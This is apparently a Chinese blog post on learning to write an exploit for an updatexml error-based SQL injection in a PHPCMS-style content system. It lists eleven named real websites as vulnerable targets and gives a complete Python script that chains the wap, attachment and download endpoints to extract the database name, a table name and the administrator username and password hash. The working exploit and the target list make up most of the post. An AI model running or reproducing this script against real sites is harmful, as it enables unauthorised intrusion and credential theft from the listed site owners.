一些网站的updatexml报错注入与exp学习编写

江小悠 178 0

漏洞网站

都是老漏洞了,我这个新手学习一下
http://www.d6xiazai.com/
http://www.zgdjzz.cn/
http://www.csuav.com/
http://www.cespc.com/
http://www.dghxjs.cn/
http://www.dqcdzz.cn/
http://www.zdblx.cn/
http://www.zgrczz.cn/
http://www.zgsykx.cn/
http://www.wjhzs.com/
http://www.szxax.com/

exp学习编写

学习漏洞原理,对poc学习自己编写exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import requests
import re
from urllib import quote
 
TIMEOUT = 5
REQ = "hex"

def payload(num,req):

    payload1 = "&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20database()),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
    payload2 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20table_name%*20from%*20information_schema.tables%*20where%*20table_schema=%*27"+req+"%*27%*20limit%*200,1),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
    payload3 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20mid((SELECT%*20username%*20from%*20"+REQ+"%*20limit%*200,1),1,16)),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
    payload4 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20mid((SELECT%*20password%*20from%*20"+REQ+"%*20limit%*200,1),1,16)),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
    payload5 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20mid((SELECT%*20password%*20from%*20"+REQ+"%*20limit%*200,1),17,40)),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
    
    if num ==1:
        return payload1
    elif num ==2:
        return payload2
    elif num ==3:
        return payload3
    elif num ==4:
        return payload4
    elif num ==5:
        return payload5
    else:
        return False
        
def exp(url):
    num =0
    while num < 5 :
        num += 1
        if num == 2:
            req = req[1]
            req = ''.join(req)
            pay = payload(num,req)
        elif num == 3:
            global REQ
            req = req[1]
            REQ = ''.join(req)
            pay = payload(num,REQ)
        else:
            req = 'hex'
            pay = payload(num,req)
        cookies = {}
        ck = '{}/index.php?m=wap&a=index&siteid=1'.format(url)
        for c in requests.get(ck, timeout=TIMEOUT).cookies:
            if c.name[-7:] == '_siteid':
                cookie_head = c.name[:6]
                cookies[cookie_head + '_userid'] = c.value
                cookies[c.name] = c.value
                break
        else:
            return False
    
        js = "{}/index.php?m=attachment&c=attachments&a=swfupload_json&src={}".format(url, quote(pay))
        for c in requests.get(js, cookies=cookies, timeout=TIMEOUT).cookies:
            if c.name[-9:] == '_att_json':
                enc_payload = c.value
                break
        else:
            return False
 
        req = url + '/index.php?m=content&c=down&a_k=' + enc_payload
        req = requests.get(req, cookies=cookies, timeout=TIMEOUT)
        #re = req.content
        req = re.findall("XPATH syntax error: '~(.*?)~' <br />",req.content)
        if req == []:
            print "column错误"
        elif num == 1:
            print "database:"+req[1]
        elif num == 2:
            print "tablename:"+req[1]
        elif num == 3:
            print "username:"+req[1]
        elif num == 4:
            pw = req[1]
        elif num == 5:
            print "password:"+pw+req[1]
        else:
            print req[1]

exp(sys.argv[1])

执行效果

一些网站的updatexml报错注入与exp学习编写

发表评论 取消回复
表情 图片 链接 代码

分享